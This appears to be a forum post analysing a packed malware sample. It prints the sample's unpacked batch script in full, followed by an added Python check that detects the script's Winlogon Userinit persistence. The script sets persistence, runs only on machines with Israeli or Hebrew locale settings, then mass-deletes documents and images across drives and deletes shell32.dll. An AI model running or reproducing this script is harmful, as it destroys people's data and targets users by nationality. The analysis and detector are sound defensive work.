Explot-root.exe - malware.
Packed with two packers: UPX and Morphine.
The unpacked file contains a .bat file, which I think explains everything:
Code:
@echo off
title

reg ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d %systemroot%\system32\userinit.exe,%systemroot%\system32\taskfile.exe /f

reg query "HKCU\Keyboard Layout\Preload" >>"%systemdrive%\svi\003988274\svss.lpd"
reg query "HKCU\Control Panel\International" >>"%systemdrive%\svi\003988274\svss.lpd"
find /I "0000040d" "%systemdrive%\svi\003988274\svss.lpd"
if %errorlevel%==1 exit
find /I "Israel" "%systemdrive%\svi\003988274\svss.lpd"
if %errorlevel%==1 exit

del /f /s C:\*.jpg C:\*.txt C:\*.doc C:\*.htm
del /f /s d:\*.jpgd:\*.txt d:\*.doc C:\*.htm
del/f /s e:\*.jpg e:\*.txt e:\*.doc C:\*.htm
del /f /s f:\*.jpg f:\*.txt f:\*.doc C:\*.htm
del /f /s g:\*.jpg g:\*.txt g:\*.doc C:\*.htm
del /f /s h:\*.jpg h:\*.txt h:\*.doc C:\*.htm
del /f /s I:\*.jpg I:\*.txt I:\*.doc C:\*.htm
del /f /s J:\*.jpg J:\*.txt J:\*.doc C:\*.htm

del /f %systemroot%\system32\shell32.dll
del /f %systemdrive%\svi*...
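Added example, not part of the original post or the sample: a check for the Winlogon Userinit persistence that the script's `reg ADD` line sets up, run over the text output of `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit`. The function names and both sample outputs are constructed for illustration, and the check assumes the only legitimate entry is userinit.exe in %systemroot%\system32.

```python
import ntpath
import re

# Assumption: the only legitimate Userinit entry is this one.
EXPECTED = r"%systemroot%\system32\userinit.exe"

# Constructed sample outputs of the reg query command (not captured from a real host).
CLEAN = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
"""
INFECTED = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
    Userinit    REG_SZ    C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\taskfile.exe
"""

def userinit_from_reg_query(text):
    """Return the Userinit value data from reg query output, or None if absent."""
    m = re.search(r"^\s*Userinit\s+REG_\w+\s+(.*)$", text, flags=re.I | re.M)
    return m.group(1).strip() if m else None

def _normalize(path, systemroot):
    """Expand %systemroot%/%windir%, drop quotes, canonicalize and lowercase."""
    path = path.strip().strip('"')
    # A lambda avoids backslashes in systemroot being read as regex escapes.
    path = re.sub(r"%(systemroot|windir)%", lambda _: systemroot, path, flags=re.I)
    return ntpath.normpath(path).lower()

def unexpected_userinit_entries(value, systemroot=r"C:\Windows"):
    """List every comma-separated Userinit entry that is not the stock userinit.exe."""
    expected = _normalize(EXPECTED, systemroot)
    extras = []
    for raw in value.split(","):
        if not raw.strip():
            continue  # the default value ends with a trailing comma
        if _normalize(raw, systemroot) != expected:
            extras.append(raw.strip())
    return extras

def audit(reg_query_output, systemroot=r"C:\Windows"):
    """Return the suspicious entries, or None when the value is missing entirely."""
    value = userinit_from_reg_query(reg_query_output)
    return None if value is None else unexpected_userinit_entries(value, systemroot)

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("infected", INFECTED)):
        print(name, audit(sample))
```

A missing Userinit value (`None`) is worth flagging too, since logon depends on it.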